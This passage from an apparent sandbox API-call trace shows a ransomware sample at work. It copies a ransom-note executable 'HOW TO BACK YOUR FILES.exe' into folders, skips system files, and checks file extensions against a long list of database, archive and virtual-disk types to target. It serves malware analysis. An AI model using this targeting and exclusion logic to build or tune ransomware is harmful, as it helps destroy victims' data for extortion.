nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="aoldtz.exe") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2=".") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="..") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="windows") returned -1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="bootmgr") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="temp") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="pagefile.sys") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="boot") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="ids.txt") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="ntuser.dat") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="perflogs") returned 1 [0040.373] lstrcmpiW (lpString1="Videos", lpString2="MSBuild") returned 1 [0040.373] lstrlenW (lpString="Videos") returned 6 [0040.373] lstrlenW (lpString="C:\\Users\\Default User\\Templates") returned 31 [0040.374] lstrcpyW (in: lpString1=0x2e2e88c, lpString2="Videos" | out: lpString1="Videos") returned="Videos" [0040.374] SetFileAttributesW (lpFileName="C:\\Users\\Default User\\Videos", dwFileAttributes=0x10) returned 1 [0040.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d24c0 [0040.374] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2e6630 [0040.374] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d24c8 | out: ListHead=0x2e77d0, ListEntry=0x2d24c8) returned 0x2d24a8 [0040.374] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0040.374] FindClose (in: hFindFile=0x2ccfa8 | out: hFindFile=0x2ccfa8) returned 1 [0040.374] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d24c8 [0040.374] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Videos", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Videos") returned="C:\\Users\\Default User\\Videos" [0040.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6630 | out: hHeap=0x2b0000) returned 1 [0040.374] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d24c0 | out: hHeap=0x2b0000) returned 1 [0040.374] lstrlenW (lpString="C:\\Users\\Default User\\Videos") returned 28 [0040.374] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Videos" | out: lpString1="C:\\Users\\Default User\\Videos") returned="C:\\Users\\Default User\\Videos" [0040.374] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0040.374] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\videos\\how to back your files.exe"), bFailIfExists=1) returned 1 [0040.379] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0040.379] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccfa8 [0040.379] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.379] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0040.379] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0040.379] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49b82fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49b82fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.379] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.379] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0040.379] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0040.379] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0040.379] FindNextFileW (in: hFindFile=0x2ccfa8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0040.379] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0040.380] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0040.380] lstrlenW (lpString="desktop.ini") returned 11 [0040.380] lstrlenW (lpString="C:\\Users\\Default User\\Videos\\*") returned 30 [0040.380] lstrcpyW (in: lpString1=0x2e2e89a, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0040.380] lstrlenW (lpString="desktop.ini") returned 11 [0040.380] lstrlenW (lpString="Ares865") returned 7 [0040.380] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0040.380] lstrlenW (lpString=".dll") returned 4 [0040.380] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0040.380] lstrlenW (lpString=".lnk") returned 4 [0040.380] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0040.380] lstrlenW (lpString=".ini") returned 4 [0040.380] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0040.380] lstrlenW (lpString=".sys") returned 4 [0040.380] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0040.380] lstrlenW (lpString="desktop.ini") returned 11 [0040.380] lstrlenW (lpString="bak") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0040.380] lstrlenW (lpString="ba_") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0040.380] lstrlenW (lpString="dbb") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0040.380] lstrlenW (lpString="vmdk") returned 4 [0040.380] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0040.380] lstrlenW (lpString="rar") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0040.380] lstrlenW (lpString="zip") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0040.380] lstrlenW (lpString="tgz") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0040.380] lstrlenW (lpString="vbox") returned 4 [0040.380] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0040.380] lstrlenW (lpString="vdi") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0040.380] lstrlenW (lpString="vhd") returned 3 [0040.380] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0040.380] lstrlenW (lpString="vhdx") returned 4 [0040.381] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0040.381] lstrlenW (lpString="avhd") returned 4 [0040.381] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0040.381] lstrlenW (lpString="db") returned 2 [0040.381] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0040.381] lstrlenW (lpString="db2") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0040.381] lstrlenW (lpString="db3") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0040.381] lstrlenW (lpString="dbf") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0040.381] lstrlenW (lpString="mdf") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0040.381] lstrlenW (lpString="mdb") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0040.381] lstrlenW (lpString="sql") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0040.381] lstrlenW (lpString="sqlite") returned 6 [0040.381] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0040.381] lstrlenW (lpString="sqlite3") returned 7 [0040.381] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0040.381] lstrlenW (lpString="sqlitedb") returned 8 [0040.381] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0040.381] lstrlenW (lpString="xml") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0040.381] lstrlenW (lpString="$er") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0040.381] lstrlenW (lpString="4dd") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0040.381] lstrlenW (lpString="4dl") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0040.381] lstrlenW (lpString="^^^") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0040.381] lstrlenW (lpString="abs") returned 3 [0040.381] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0040.381] lstrlenW (lpString="abx") returned 3 [0040.382] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0040.382] lstrlenW (lpString="accdb") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0040.382] lstrlenW (lpString="accdc") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0040.382] lstrlenW (lpString="accde") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0040.382] lstrlenW (lpString="accdr") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0040.382] lstrlenW (lpString="accdt") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0040.382] lstrlenW (lpString="accdw") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0040.382] lstrlenW (lpString="accft") returned 5 [0040.382] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0040.382] lstrlenW (lpString="adb") returned 3 [0040.382] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.382] lstrlenW (lpString="adb") returned 3 [0040.382] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0040.382] lstrlenW (lpString="ade") returned 3 [0040.382] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0040.382] lstrlenW (lpString="adf") returned 3 [0040.382] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0040.382] lstrlenW (lpString="adn") returned 3 [0040.382] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0040.382] lstrlenW (lpString="adp") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0040.384] lstrlenW (lpString="alf") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0040.384] lstrlenW (lpString="ask") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0040.384] lstrlenW (lpString="btr") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0040.384] lstrlenW (lpString="cat") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0040.384] lstrlenW (lpString="cdb") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0040.384] lstrlenW (lpString="ckp") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0040.384] lstrlenW (lpString="cma") returned 3 [0040.384] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0040.385] lstrlenW (lpString="cpd") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0040.385] lstrlenW (lpString="dacpac") returned 6 [0040.385] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0040.385] lstrlenW (lpString="dad") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0040.385] lstrlenW (lpString="dadiagrams") returned 10 [0040.385] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0040.385] lstrlenW (lpString="daschema") returned 8 [0040.385] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0040.385] lstrlenW (lpString="db-journal") returned 10 [0040.385] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0040.385] lstrlenW (lpString="db-shm") returned 6 [0040.385] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0040.385] lstrlenW (lpString="db-wal") returned 6 [0040.385] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0040.385] lstrlenW (lpString="dbc") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0040.385] lstrlenW (lpString="dbs") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0040.385] lstrlenW (lpString="dbt") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0040.385] lstrlenW (lpString="dbv") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0040.385] lstrlenW (lpString="dbx") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0040.385] lstrlenW (lpString="dcb") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0040.385] lstrlenW (lpString="dct") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0040.385] lstrlenW (lpString="dcx") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0040.385] lstrlenW (lpString="ddl") returned 3 [0040.385] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0040.385] lstrlenW (lpString="dlis") returned 4 [0040.386] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0040.386] lstrlenW (lpString="dp1") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0040.386] lstrlenW (lpString="dqy") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0040.386] lstrlenW (lpString="dsk") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0040.386] lstrlenW (lpString="dsn") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0040.386] lstrlenW (lpString="dtsx") returned 4 [0040.386] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0040.386] lstrlenW (lpString="dxl") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0040.386] lstrlenW (lpString="eco") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0040.386] lstrlenW (lpString="ecx") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0040.386] lstrlenW (lpString="edb") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0040.386] lstrlenW (lpString="epim") returned 4 [0040.386] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0040.386] lstrlenW (lpString="fcd") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0040.386] lstrlenW (lpString="fdb") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0040.386] lstrlenW (lpString="fic") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0040.386] lstrlenW (lpString="flexolibrary") returned 12 [0040.386] lstrlenW (lpString="fm5") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0040.386] lstrlenW (lpString="fmp") returned 3 [0040.386] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0040.386] lstrlenW (lpString="fmp12") returned 5 [0040.387] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0040.387] lstrlenW (lpString="fmpsl") returned 5 [0040.387] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0040.387] lstrlenW (lpString="fol") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0040.387] lstrlenW (lpString="fp3") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0040.387] lstrlenW (lpString="fp4") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0040.387] lstrlenW (lpString="fp5") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0040.387] lstrlenW (lpString="fp7") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0040.387] lstrlenW (lpString="fpt") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0040.387] lstrlenW (lpString="frm") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0040.387] lstrlenW (lpString="gdb") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.387] lstrlenW (lpString="gdb") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0040.387] lstrlenW (lpString="grdb") returned 4 [0040.387] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0040.387] lstrlenW (lpString="gwi") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0040.387] lstrlenW (lpString="hdb") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0040.387] lstrlenW (lpString="his") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0040.387] lstrlenW (lpString="ib") returned 2 [0040.387] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0040.387] lstrlenW (lpString="idb") returned 3 [0040.387] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0040.387] lstrlenW (lpString="ihx") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0040.388] lstrlenW (lpString="itdb") returned 4 [0040.388] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0040.388] lstrlenW (lpString="itw") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0040.388] lstrlenW (lpString="jet") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0040.388] lstrlenW (lpString="jtx") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0040.388] lstrlenW (lpString="kdb") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0040.388] lstrlenW (lpString="kexi") returned 4 [0040.388] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0040.388] lstrlenW (lpString="kexic") returned 5 [0040.388] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0040.388] lstrlenW (lpString="kexis") returned 5 [0040.388] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0040.388] lstrlenW (lpString="lgc") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0040.388] lstrlenW (lpString="lwx") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0040.388] lstrlenW (lpString="maf") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0040.388] lstrlenW (lpString="maq") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0040.388] lstrlenW (lpString="mar") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0040.388] lstrlenW (lpString="marshal") returned 7 [0040.388] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0040.388] lstrlenW (lpString="mas") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0040.388] lstrlenW (lpString="mav") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0040.388] lstrlenW (lpString="maw") returned 3 [0040.388] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0040.389] lstrlenW (lpString="mdbhtml") returned 7 [0040.389] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0040.389] lstrlenW (lpString="mdn") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0040.389] lstrlenW (lpString="mdt") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0040.389] lstrlenW (lpString="mfd") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0040.389] lstrlenW (lpString="mpd") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0040.389] lstrlenW (lpString="mrg") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0040.389] lstrlenW (lpString="mud") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0040.389] lstrlenW (lpString="mwb") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0040.389] lstrlenW (lpString="myd") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0040.389] lstrlenW (lpString="ndf") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0040.389] lstrlenW (lpString="nnt") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0040.389] lstrlenW (lpString="nrmlib") returned 6 [0040.389] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0040.389] lstrlenW (lpString="ns2") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0040.389] lstrlenW (lpString="ns3") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0040.389] lstrlenW (lpString="ns4") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0040.389] lstrlenW (lpString="nsf") returned 3 [0040.389] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0040.389] lstrlenW (lpString="nv") returned 2 [0040.389] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0040.389] lstrlenW (lpString="nv2") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0040.390] lstrlenW (lpString="nwdb") returned 4 [0040.390] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0040.390] lstrlenW (lpString="nyf") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0040.390] lstrlenW (lpString="odb") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.390] lstrlenW (lpString="odb") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0040.390] lstrlenW (lpString="oqy") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0040.390] lstrlenW (lpString="ora") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0040.390] lstrlenW (lpString="orx") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0040.390] lstrlenW (lpString="owc") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0040.390] lstrlenW (lpString="p96") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0040.390] lstrlenW (lpString="p97") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0040.390] lstrlenW (lpString="pan") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0040.390] lstrlenW (lpString="pdb") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0040.390] lstrlenW (lpString="pdm") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0040.390] lstrlenW (lpString="pnz") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0040.390] lstrlenW (lpString="qry") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0040.390] lstrlenW (lpString="qvd") returned 3 [0040.390] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0040.390] lstrlenW (lpString="rbf") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0040.391] lstrlenW (lpString="rctd") returned 4 [0040.391] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0040.391] lstrlenW (lpString="rod") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0040.391] lstrlenW (lpString="rodx") returned 4 [0040.391] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0040.391] lstrlenW (lpString="rpd") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0040.391] lstrlenW (lpString="rsd") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0040.391] lstrlenW (lpString="sas7bdat") returned 8 [0040.391] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0040.391] lstrlenW (lpString="sbf") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0040.391] lstrlenW (lpString="scx") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0040.391] lstrlenW (lpString="sdb") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0040.391] lstrlenW (lpString="sdc") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0040.391] lstrlenW (lpString="sdf") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0040.391] lstrlenW (lpString="sis") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0040.391] lstrlenW (lpString="spq") returned 3 [0040.391] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0040.391] lstrlenW (lpString="te") returned 2 [0040.391] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0040.391] lstrlenW (lpString="teacher") returned 7 [0040.391] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0040.391] 